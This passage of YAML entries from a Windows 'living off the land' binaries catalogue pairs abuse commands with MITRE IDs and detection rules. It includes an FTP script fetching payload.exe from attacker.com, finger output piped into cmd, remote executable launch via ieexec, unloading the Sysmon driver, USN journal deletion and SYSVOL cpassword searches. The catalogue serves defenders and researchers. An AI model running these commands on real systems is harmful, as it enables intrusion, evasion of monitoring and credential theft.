Tsai Handle: '@orange_8361' ================================================ FILE: yml/OSBinaries/Expand.yml ================================================ --- Name: Expand.exe Description: Binary that expands one or more compressed files Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat} Description: Copies source file to destination. Usecase: Use to copies the source file to the destination file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext} Description: Copies source file to destination. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat Description: Copies source file to destination Alternate Data Stream (ADS) Usecase: Copies files from A to B Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml Resources: - Link: https://twitter.com/infosecn1nja/status/986628482858807297 - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 Acknowledgement: - Person: Rahmat Nurfauzi Handle: '@infosecn1nja' - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Explorer.yml ================================================ --- Name: Explorer.exe Description: Binary used for managing files and system components within Windows Author: Jai Minton Created: 2020-06-24 Commands: - Command: explorer.exe /root,"{PATH_ABSOLUTE:.exe}" Description: Execute specified .exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: explorer.exe {PATH_ABSOLUTE:.exe} Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml - Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious. Resources: - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 - Link: https://twitter.com/bohops/status/1276356245541335048 - Link: https://twitter.com/bohops/status/986984122563391488 Acknowledgement: - Person: Jai Minton Handle: '@CyberRaiju' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSBinaries/Extexport.yml ================================================ --- Name: Extexport.exe Description: Load a DLL located in the c:\test folder with a specific name. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Extexport.exe {PATH_ABSOLUTE:folder} foo bar Description: Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll. Usecase: Execute dll file Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml - IOC: Extexport.exe loads dll and is execute from other folder the original path Resources: - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ Acknowledgement: - Person: Adam Handle: '@hexacorn' ================================================ FILE: yml/OSBinaries/Extrac32.yml ================================================ --- Name: Extrac32.exe Description: Extract to ADS, copy or overwrite a file with Extrac32.exe Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - Command: extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE} Description: Copy the source file to the destination file and overwrite it. Usecase: Download file from UNC/WEBDav Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe} Description: Command for copying file from one folder to another Usecase: Copy file Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe Detection: - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: Hai Vaknin(Lux Handle: '@VakninHai' - Person: Tamir Yehuda Handle: '@tim8288' ================================================ FILE: yml/OSBinaries/Findstr.yml ================================================ --- Name: Findstr.exe Description: Write to ADS, discover, or download files with Findstr.exe Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file. Usecase: Add a file to an alternate data stream to hide from defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /S /I cpassword \\sysvol\policies\*.xml Description: Search for stored password in Group Policy files stored on SYSVOL. Usecase: Find credentials stored in cpassword attrbute Category: Credentials Privileges: User MitreID: T1552.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe} Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. Usecase: Download/Copy file from webdav server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Finger.yml ================================================ --- Name: Finger.exe Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon Author: Ruben Revuelta Created: 2021-08-30 Commands: - Command: finger user@example.host.com | more +2 | cmd Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' Usecase: Download malicious payload Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 Full_Path: - Path: c:\windows\system32\finger.exe - Path: c:\windows\syswow64\finger.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml - IOC: finger.exe should not be run on a normal workstation. - IOC: finger.exe connecting to external resources. Resources: - Link: https://twitter.com/DissectMalware/status/997340270273409024 - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) Acknowledgement: - Person: Ruben Revuelta (MAPFRE CERT) Handle: '@rubn_RB' - Person: Jose A. Jimenez (MAPFRE CERT) Handle: '@Ocelotty6669' - Person: Malwrologist Handle: '@DissectMalware' ================================================ FILE: yml/OSBinaries/FltMC.yml ================================================ --- Name: fltMC.exe Description: Filter Manager Control Program used by Windows Author: John Lambert Created: 2021-09-18 Commands: - Command: fltMC.exe unload SysmonDrv Description: Unloads a driver used by security agents Usecase: Defense evasion Category: Tamper Privileges: Admin MitreID: T1562.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\fltMC.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml - IOC: 4688 events with fltMC.exe Resources: - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon Acknowledgement: - Person: Carlos Perez Handle: '@Carlos_Perez' ================================================ FILE: yml/OSBinaries/Forfiles.yml ================================================ --- Name: Forfiles.exe Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}" Description: Executes specified command since there is a match for notepad.exe in the c:\windows\System32 folder. Usecase: Use forfiles to start a new process to evade defensive counter measures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml Resources: - Link: https://twitter.com/vector_sec/status/896049052642533376 - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Eric Handle: '@vector_sec' - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Fsutil.yml ================================================ --- Name: Fsutil.exe Description: File System Utility Author: Elliot Killick Created: 2021-08-16 Commands: - Command: fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE} Description: Zero out a file Usecase: Can be used to forensically erase a file Category: Tamper Privileges: User MitreID: T1485 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: 'fsutil.exe usn deletejournal /d c:' Description: Delete the USN journal volume to hide file creation activity Usecase: Can be used to hide file creation activity Category: Tamper Privileges: User MitreID: T1485 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: fsutil.exe trace decode Description: Executes a pre-planted binary named netsh.exe from the current directory. Usecase: Spawn a pre-planted executable from fsutil.exe. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe Detection: - IOC: fsutil.exe should not be run on a normal workstation - IOC: file setZeroData (not case-sensitive) in the process arguments - IOC: Sysmon Event ID 1 - IOC: Execution of process fsutil.exe with trace decode could be suspicious - IOC: Non-Windows netsh.exe execution - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml Resources: - Link: https://twitter.com/0gtweet/status/1720724516324704404 Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' - Person: Jimmy Handle: '@bohops' - Person: Grzegorz Tworek Handle: '@0gtweet' ================================================ FILE: yml/OSBinaries/Ftp.yml ================================================ --- Name: Ftp.exe Description: A binary designed for connecting to FTP servers Author: Oddvar Moe Created: 2018-12-10 Commands: - Command: echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt Description: Executes the commands you put inside the text file. Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml - IOC: cmd /c as child process of ftp.exe Resources: - Link: https://twitter.com/0xAmit/status/1070063130636640256 - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 - Link: https://ss64.com/nt/ftp.html - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: BennyHusted Handle: '' - Person: Amit Serper Handle: '@0xAmit' ================================================ FILE: yml/OSBinaries/Gpscript.yml ================================================ --- Name: Gpscript.exe Description: Used by group policy to process scripts Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Gpscript /logon Description: Executes logon scripts configured in Group Policy. Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Category: Execute Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Category: Execute Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml - IOC: Scripts added in local group policy - IOC: Execution of Gpscript.exe after logon Resources: - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Hh.yml ================================================ --- Name: Hh.exe Description: Binary used for processing chm files in Windows Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: HH.exe {REMOTEURL:.bat} Description: Open the target batch script with HTML Help. Usecase: Download files from url Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Application: GUI - Command: HH.exe {PATH_ABSOLUTE:.exe} Description: Executes specified executable with HTML Help. Usecase: Execute process with HH.exe Category: Execute Privileges: User MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Application: GUI - Command: HH.exe {REMOTEURL:.chm} Description: Executes a remote .chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute Privileges: User MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - Execute: CHM - Execute: Remote Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml Resources: - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/IMEWDBLD.yml ================================================ --- Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module Author: Wade Hickey Created: 2020-03-05 Commands: - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL} Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml Resources: - Link: https://twitter.com/notwhickey/status/1367493406835040265 Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ================================================ FILE: yml/OSBinaries/Ie4uinit.yml ================================================ --- Name: Ie4uinit.exe Description: Executes commands from a specially prepared ie4uinit.inf file. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ie4uinit.exe -BaseSettings Description: Executes commands from a specially prepared ie4uinit.inf file. Usecase: Get code execution by copy files to another location Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe - Path: c:\windows\system32\ieuinit.inf - Path: c:\windows\sysWOW64\ieuinit.inf Detection: - IOC: ie4uinit.exe copied outside of %windir% - IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml Resources: - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSBinaries/Iediagcmd.yml ================================================ --- Name: iediagcmd.exe Description: Diagnostics Utility for Internet Explorer Author: manasmbellani Created: 2022-03-29 Commands: - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}' Description: Executes binary that is pre-planted at C:\test\system32\netsh.exe. Usecase: Spawn a pre-planted executable from iediagcmd.exe. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: - Sigma: https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml - IOC: Sysmon Event ID 1 - IOC: Execution of process iediagcmd.exe with /out could be suspicious Resources: - Link: https://twitter.com/Hexacorn/status/1507516393859731456 Acknowledgement: - Person: Adam Handle: '@hexacorn' ================================================ FILE: yml/OSBinaries/Ieexec.yml ================================================ --- Name: Ieexec.exe Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ieexec.exe {REMOTEURL:.exe} Description: Downloads and executes executable from the remote server. Usecase: Download and run attacker code from remote location Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - Execute: EXE (.NET) - Command: ieexec.exe {REMOTEURL:.exe} Description: Downloads and executes executable from the remote server. Usecase: Download and run attacker code from remote location Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - IOC: Network connections originating from ieexec.exe may be suspicious Resources: - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSBinaries/Ilasm.yml ================================================ --- Name: Ilasm.exe Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) Created: 2020-03-17 Commands: - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /exe Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /dll Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll Usecase: A description of the usecase Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Detection: - IOC: Ilasm may not be used often in production environments (such as on endpoints) - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml Resources: - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt Acknowledgement: - Person: Hai Vaknin(Lux) Handle: '@VakninHai' - Person: Lior Adar ================================================ FILE: yml/OSBinaries/Infdefaultinstall.yml ================================================ --- Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: InfDefaultInstall.exe {PATH:.inf} Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Usecase: Code execution Category: Execute Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe Code_Sample: - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' ================================================ FILE: yml/OSBinaries/Installutil.yml ================================================ --- Name: Installutil.exe Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: AWL Bypass Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: Execute Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - Execute: EXE (.NET) - Command: InstallUtil.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Detection: - Sigma: 